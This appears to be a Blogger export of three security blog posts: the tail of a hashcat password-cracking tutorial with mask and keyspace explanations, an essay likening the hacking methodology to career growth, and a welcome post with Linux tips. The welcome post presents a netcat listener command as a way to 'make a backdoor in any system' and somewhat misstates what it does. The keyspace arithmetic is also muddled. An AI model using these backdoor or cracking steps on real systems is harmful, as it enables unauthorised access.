<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXkHeR0GnTPj4Z_0nE64015Xkyxg4uN9RU2h8NJRKSyJAY3gRjegiZtsR0T2U_EMNF4RBDnrFb2dn2k9NJOW8gd3tfQCP3QuhY96PNVTCoaDO36lxoKG9O1YwIIynJx99p1ZyUFZ0OluVW/s1600/Screenshot+from+2016-05-07+19%253A15%253A17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXkHeR0GnTPj4Z_0nE64015Xkyxg4uN9RU2h8NJRKSyJAY3gRjegiZtsR0T2U_EMNF4RBDnrFb2dn2k9NJOW8gd3tfQCP3QuhY96PNVTCoaDO36lxoKG9O1YwIIynJx99p1ZyUFZ0OluVW/s320/Screenshot+from+2016-05-07+19%253A15%253A17.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsVAkB8VOJt1ftiW-OphtlDynks1wn9U8GFjdc5WpT-kD9M8piit8mjMJmJBb6rgeC_A9-t1SGGToYmEBBbO2SvcdZnbfwX_Cri2JdWJBH-DZC_IYQm4eo4UY3rnZZ7k0Iv4iL2K0RBmuy/s1600/Screenshot+from+2016-05-07+19%253A16%253A21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsVAkB8VOJt1ftiW-OphtlDynks1wn9U8GFjdc5WpT-kD9M8piit8mjMJmJBb6rgeC_A9-t1SGGToYmEBBbO2SvcdZnbfwX_Cri2JdWJBH-DZC_IYQm4eo4UY3rnZZ7k0Iv4iL2K0RBmuy/s320/Screenshot+from+2016-05-07+19%253A16%253A21.png" width="320" /></a></div>
<br />
Now, I will run the same commands to crack this password.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLmztLiDZNe_V0HdLYOqnt7Y9VPpGoGui8I0A8Sx6UxGFD8qbO_pZOetuOCeL1xMA9mu9Trh-8pLtqhs4TM7LbM9MgStkIU7ax_rUyjBeZjqlZ7jaXNI0d2X2kktVIJHnLz6FZvnLk_Tsg/s1600/Screenshot+from+2016-05-07+19%253A25%253A12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLmztLiDZNe_V0HdLYOqnt7Y9VPpGoGui8I0A8Sx6UxGFD8qbO_pZOetuOCeL1xMA9mu9Trh-8pLtqhs4TM7LbM9MgStkIU7ax_rUyjBeZjqlZ7jaXNI0d2X2kktVIJHnLz6FZvnLk_Tsg/s320/Screenshot+from+2016-05-07+19%253A25%253A12.png" width="320" /></a></div>
<br />
<br />
<br />
It worked in THREE seconds. Now, to be fair, it was a dictionary word and I used the rockyou dictionary to crack it. Let's make it a little more difficult for hashcat. I created a password that uses uppercase and lowercase. Let's see how hashcat does.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRcafqK2SZwuiI7TN3TQh8cFvkN_b-5V4G6z97QwPVyGnC0OgkK097bgyx5HfMLuc8GkS2sNv30_lu790JmbIMKIAD5WzfpYuBabYSsS_GuEo4HytfDjOvjgUMSgUr2jOiH8ag5R-rKxjh/s1600/Screenshot+from+2016-05-07+20%253A26%253A44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRcafqK2SZwuiI7TN3TQh8cFvkN_b-5V4G6z97QwPVyGnC0OgkK097bgyx5HfMLuc8GkS2sNv30_lu790JmbIMKIAD5WzfpYuBabYSsS_GuEo4HytfDjOvjgUMSgUr2jOiH8ag5R-rKxjh/s320/Screenshot+from+2016-05-07+20%253A26%253A44.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
Hashcat allows for 'masks' which allow you to specify which types of characters will be where in the password. As we can see, I have an upper case letter, followed by 4 lower case letters, an upper case letter, followed by 5 lower case letters. Two words, put together, first letter capitalized. These masks allow for very specific guessing of passwords and drastically reduces the keyspace that hashcat needs to guess. For example, if you knew that I only used upper and lower case and that it was 11 characters long, the keyspace is 52^11 ~ 7.5*10^18. By specifying a mask, we reduce the keyspace to 26^11 ~ 3.6*10^15. The keyspace becomes approximately 2000 times smaller. So if we go by hashcat's output, 10 years would become 20,000 years. This is a great example at how computationally expensive cracking passwords can get just by adding one more letter or one more set of characters (numbers, upper case, lower case, special).<br />
<br />
Hashcat allows for masks, dictionary files, combinations of dictionary words from files, permutations of words from a dictionary, hybrid attacks, table-lookups, and rule-based attacks. I recommend looking at hashcat's wiki to understand the more complex attacks but they can get pretty specific and the more you know about the potential password, the easier it will be to crack. <br />
<br />
Lastly, if anyone is looking for unsolicited advice, I always recommend using a pass<b>phrase</b> rather than a pass<b>word</b>. 'ILoveMyCatSoMuch!0906' which could be a true statement (easy to remember), punctuation that emphasizes your true statement, and your cat's birthday (in this case) makes a very secure password that incorporates all four categories of characters, 21 character length, and it's easy to remember because it's a true statement about yourself. Now, like everything else, this is exploitable. Specifically, this is subject to Social Engineering. This password could be guessed however, the attacker would have to know you love your cat, know which letters you capitalized, which order each word goes in, and which order the sentence, punctuation, and birthday go in (for example, !0906ILoveMyCatALot, MyCatFluffyWasBorn0906, 123MyCatIsSoAwesome?!?! are all great passwords that revolve around an important part of your life. <br />
<br />
There is no silver bullet to password cracking but hashcat is a very powerful password cracking tool and I'm very happy I decided to add it to my arsenal of hacking tools. Look it up, learn it, be great!<br />
<br />
<br />
<br />
*These posts are not in any particular order, I am not receiving any compensation from anyone to post these sites, and these sites do not necessarily reflect my opinion, my employer's opinion, nor any certification bodies' opinions of which I hold one or more of their certificates. Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-54581052231101736972016-05-06T21:41:00.000-04:002016-06-15T21:57:01.871-04:00Professional Development MethodologyMost hackers/security analysts have been exposed to the 'Hacking Methodology.' In general, it is as follows:<br />
<ol>
<li>Perform Recon</li>
<ol>
<li>Passive</li>
<li>Active</li>
</ol>
<li>Enumeration</li>
<li>Exploitation</li>
<li>Privilege Escalation</li>
<li>Exfiltration</li>
<li>Persistence</li>
</ol>
You can argue semantics all you like but, skilled hackers/penetration testers/security analysts will follow these steps and the more determined the attacker is...the more time they will spend in recon and enumeration. This is where most of hacking is done and to create an analogy to professional development, it is where you should spend most of your time hacking (read developing) yourself. In addition, your professional development results are directly correlated to how much time and effort you put into yourself; just like spending time researching your target before you exploit.<br />
<br />
So, you're here, reading this post. What is it that you want to improve? Where do you envision yourself in 1, 5, 10 years? How do you do that? Recon!<br />
<br />
Passive recon for professional development, especially when it comes to the computer security industry, is very useful. Reading blogs, reading books, listening to podcasts, and learn about the industry. Who are the big names? Why are they the big names? what are the basics of the industry? This extends outside of hacking or computer security! If you want to be a musician, you start learning how to read music. If you want to be a doctor, you start learning biology.<br />
<br />
Active recon for professional development would be more participatory. So, in the computer security industry, it would be participating in CTFs, it would be downloading metasploitable and running some exploits. You are still honing your skills and solidifying your baseline understanding. Extending this to other industries and professional development in general it becomes the Nike slogan: Just do it. If you want to be an artist, just paint. If you want to break into the finance industry, start by budgeting your own finances.<br />
<br />
Active and passive recon will be a permanent part of hacking and professional development and no matter what, you should always spend SOME time in this area so you can continue to learn and improve upon new skills. <br />
<br />
Enumeration, in terms of professional development, will be listing out what you want to/need to work on in order to become a professional, IN YOUR TERMS. That's the most important part. What do YOU believe, based on your passive and active recon, that you need to accomplish to push yourself forward. Only you can make you a professional and only you can push yourself to accomplish what you want and only you know where you stand on any individual skill. So enumerate them and then perform more passive and active recon if necessary.<br />
<br />
Now, it's time for everyone's favorite part of the hacking methodology: Exploitation. What is exploitation when it comes to professional development?? It's your first shot. Your big break. Your first painting sold. Your first taxes filed as a CPA. Your first patient as a doctor. Your first computer exploited with MS08-067 (if you don't know which exploit that is, add it to your passive and active recon). This is a very important step and also where a lot of people fail. Lots of people can't take rejection of their ideas, business plans, or pieces of art. You MUST be able to take this rejection. Something that helped me deal with rejection is understanding that I am as much of the product as what I do, which includes this blog! I am confident in my knowledge and what I've learned and I believe it is worthwhile to spread my knowledge. My first post on this blog got 10 views. Only 10, but, there were people from three different countries that viewed it! I choose to focus on those individuals across the world that may or may not have been influenced by my first post rather than the fact that only 10 people saw it. Your rejections makes excellent stepping stones to your ultimate success. <br />
<br />
Lastly, privilege escalation, exfiltration, and persistence can all be combined, when it comes to professional development, as professional maintenance. You are the best you in the world. So be the best you and continue to be the best you the world has ever seen. Continue to do recon, continue to actively enumerate future steps in your journey, continue to step outside of your comfort zone and show the world what you can do. Every failure is something to learn from and every success is something to celebrate but, you are never done. Use the Navy SEAL 40% rule: when you think you're done, you're only 40% done.<br />
<br />
So all you hackers out there that want to become more professional or develop yourselves, keep this analogy in mind and as Offensive Security says about their OSCP certification, Try Harder.Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-21515996277284391972016-05-03T22:17:00.000-04:002016-06-15T21:57:53.262-04:00WelcomeAs an aspiring security expert, there are many blogs, podcasts, articles, and tutorials for learning anything and everything from a technical perspective on security.<br />
<br />
There are also many professional development resources that might be ignored by the security community or simply not relevant to our field.<br />
<br />
I am going to combine our desire for highly technical learning and help us conquer one of our biggest problems: professional development. In my experience this is also phrased as, "helping management understand", "convincing C-level execs to spend money on security", "Ugh, my boss is such an idiot he doesn't understand how security works."<br />
<br />
So for my first post, I'm going to give you three professional development tips and three technical bits of information.<br />
<br />
Professional Development:<br />
<ol>
<li>95% of the time it's better to hold your tongue and say nothing. The other 5% of the time it's best to hold your tongue, sleep on your response, and form your response in a constructive, supportive, problem-solving manner. If you want to convince managers to like you, support you, and provide you with what you need then you need to help them to help you. You don't have to be best friends with your management but, having a positive working relationship will make every one's life easier.</li>
<li>Invest in yourself. Whether this means training on a new technology, a vacation to reduce stress, or going back to school to advance your current skills and/or gain new ones. Most companies offer opportunities to do this. Go for it! Take advantage of these opportunities to become the best incident handler, technical manager, penetration tester, security engineer, etc that your company has. Professional development is not all about improving your soft skills.</li>
<li>I know I just said it's not all about improving your soft skills but, it is ALWAYS beneficial to work on your soft skills. Always. Better writing, better speaking, better conflict resolution, better change management, etc. Any highly respected individual has a great aptitude in these areas and knows how to use them to solve problems. Business is all about solving problems and if you can't communicate your solutions, no matter how great they are, they will never be implemented. </li>
</ol>
Technical Bits:<br />
<ol>
<li>If you're sick of seeing tons of errors while typing commands on the linux command line redirect STDERR to a file or my favorite, /dev/null. So after you type your command: <i>ping -c 3 777.777.777.777, </i>append 2> /dev/null if you never want to see or recover your errors. Otherwise, write 2>error.txt. It will look like this: <i>ping -c 3 777.777.777.777 2>/dev/null </i>or <i>ping -c 3 777.777.777.777 2>errors.txt. </i>If you chose to redirect STDERR to errors.txt, you can <i>cat errors.txt</i> and you will see the following error message, <i>ping: unknown host 777.777.777.777</i>. I often use this to eliminate errors while I am grep-ing for a file in a file system so I only see my findings and not all the errors about directories I cannot access. </li>
<li>In my opinion, there is one best way of listing files in a directory on linux: <i>ls -halt <directory></i> (If no directory is specified then it will list the current directory you are in. If you don't know where you are run <i>pwd</i>). Each of these flags has an important use but it's also very easy to remember 'halt'. -h renders the sizes of the files in a human readable format, such as 23KB or 4GB instead of 2342523 Bytes. -a lists all the files including the current directory . and the next level up directory .. (you can use -A to not show those but I never remember that when i'm actually running the command). -l prints the results in the 'long listing' format. The difference is quite dramatic so I recommend the reader run both <i>ls -hat </i>and <i>ls -halt </i>to see the differences but in short, one shows you all the files and one shows you all the files with all of their metadata. Lastly, the -t command orders the files by modification time with newest first. This can be really helpful from an incident handling perspective to see which files have been modified recently by malware, a malicious user, or a guilty employee trying to cover their tracks. </li>
<li>The most simple way to make a backdoor in any system is using netcat! This tool is invaluable for security experts and whether you believe you know it well or not, go read about it again. In fact, I am as soon as I finish writing this post. <i>nc -nvlp <port> </i>. That is how you make a backdoor in any system. -n removes dns lookups so you just need the ip address to reconnect. -v is verbose, depending on the security posture and what your intentions are for setting up the back door use this flag to fit your needs. -l is to listen (which is why you don't specificy an IP address in this command). -p is for the port. Now, the downside is that anyone who finds this port can simply connect and will have a shell as whatever user ran the 'nc' command. On the upside, this tool is very versatile and you will use it for the rest of your security career so you might as well get really, really comfortable with it. </li>
</ol>
I hope you guys enjoyed my first post, I will be making them as often as I can and feel free to reach out to me with suggestions or comments on my blog. I make no guarantees to anything but, I consider myself a reasonable person. I also should mention that my thoughts, comments, opinions are my own and do not represent any companies I work for, associate with, or are certified by. We are starting a new era of highly professional, highly technical security experts. <br />
<br />Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0